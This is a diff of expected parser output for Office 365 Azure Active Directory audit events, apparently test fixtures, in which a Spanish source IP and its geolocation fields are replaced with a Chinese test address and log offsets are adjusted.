         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1219,20 +1205,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1243,8 +1227,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -1259,7 +1243,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 40163,
+        "log.offset": 40147,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1288,9 +1272,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1382,20 +1366,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1406,8 +1388,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -1422,7 +1404,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 45361,
+        "log.offset": 45343,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1451,9 +1433,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1545,20 +1527,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1569,8 +1549,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:47.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -1585,7 +1565,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 50516,
+        "log.offset": 50496,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1614,9 +1594,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:47",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1708,20 +1688,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1732,8 +1710,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:47.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -1748,7 +1726,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 55714,
+        "log.offset": 55692,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1777,9 +1755,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:47",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1871,20 +1849,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1895,8 +1871,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:47.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -1911,7 +1887,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 60912,
+        "log.offset": 60888,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1940,9 +1916,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:47",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2034,20 +2010,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2058,8 +2032,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:47.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -2074,7 +2048,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 66067,
+        "log.offset": 66041,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2103,9 +2077,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:47",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2197,20 +2171,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2221,8 +2193,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:47.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -2237,7 +2209,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 71265,
+        "log.offset": 71237,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2266,9 +2238,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:47",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2360,20 +2332,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2384,8 +2354,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:47.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -2400,7 +2370,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 76420,
+        "log.offset": 76390,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2429,9 +2399,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:47",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2523,20 +2493,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2547,8 +2515,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:47.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -2563,7 +2531,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 81575,
+        "log.offset": 81543,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2592,9 +2560,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:47",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2686,20 +2654,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2710,8 +2676,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:47.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -2726,7 +2692,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 86773,
+        "log.offset": 86739,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2755,9 +2721,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:47",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2849,20 +2815,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2873,8 +2837,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:52.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -2889,7 +2853,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 91928,
+        "log.offset": 91892,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2918,9 +2882,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:52",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2996,20 +2960,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3020,8 +2982,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:52.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -3036,7 +2998,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 97179,
+        "log.offset": 97141,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3065,9 +3027,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:52",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3143,20 +3105,18 @@
         "o365.audit.Version": 1,
